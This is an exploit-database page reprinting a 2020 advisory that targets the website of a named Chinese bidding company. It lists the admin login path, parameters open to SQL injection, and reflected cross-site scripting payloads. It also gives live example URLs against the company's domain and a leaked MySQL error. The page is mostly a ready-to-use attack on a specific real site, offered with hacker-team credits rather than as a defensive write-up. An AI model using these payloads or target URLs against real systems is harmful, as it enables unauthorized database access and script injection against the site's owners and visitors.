Advertisement






Guangzhou China Enonomic Bidding Co Ltd XSS SQL Injection

CVE Category Price Severity
N/A CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2020-01-23
CPE
cpe:cpe:/a:guangzhou:china_enonomic_bidding_co_ltd
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010175

Below is a copy:

Guangzhou China Enonomic Bidding Co Ltd XSS SQL Injection
###################################################################

# Exploit Title : Guangzhou China Enonomic Bidding Co Ltd XSS SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 23/01/2020
# Vendor Homepage : gzbidding.cn
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During 
Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Guangzhou China Enonomic Bidding Co Ltd is prone to an SQL-injection 
vulnerability because it fails to sufficiently sanitize user-supplied data before using 
it in an SQL query. Exploiting this issue could allow an attacker to compromise the 
application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

Reflected XSS (or Non-Persistent) :
***************************************
The server reads data directly from the HTTP request and reflects it back in the HTTP response. 
Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
 to a vulnerable web application, which is then reflected back to the victim and executed by the 
web browser. The most common mechanism for delivering malicious content is to include 
it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. 
URLs constructed in this manner constitute the core of many phishing schemes, whereby 
an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects 
the attacker's content back to the victim,the content is executed by the victim's browser.

###################################################################

# Admin Panel Login Path :
*************************
/login.php

# SQL Injection Exploit :
**********************
/channel.php?channel_ID=[SQL Injection]

/view.php?news_ID=[ID-NUMBER]&channel_ID=4&subject_ID=[SQL Injection]

/download.php?download_ID=[ID-NUMBER]&channel_ID=[ID-NUMBER]&subject_ID=[SQL Injection]

# Cross Site Scripting XSS Exploit :
********************************
">--></SCRIPT>">%27><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%20HTTP/1.1

">--></SCRIPT>KingSkrupellos<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%20HTTP/1.1

/view.php?news_ID=4024&channel_ID=4&subject_ID=%22%3E--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E%20HTTP/1.1

###################################################################

# Example Vulnerable Sites :
*************************
[+] gzbidding.cn/download.php?download_ID=1&channel_ID=7&subject_ID=1%27

[+] gzbidding.cn/view.php?news_ID=4024&channel_ID=4&subject_ID=%22%3E--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E%20HTTP/1.1

###################################################################

# Example SQL Database Error :
****************************
Database error in: : Invalid SQL: update gzxgwk_cn_download SET 
download_hits=download_hits+1 WHERE download_ID=
mysql error code:: You have an error in your SQL syntax; check the 
manual that corresponds to your MySQL server version for the right 
syntax to use near '' at line 1

###################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.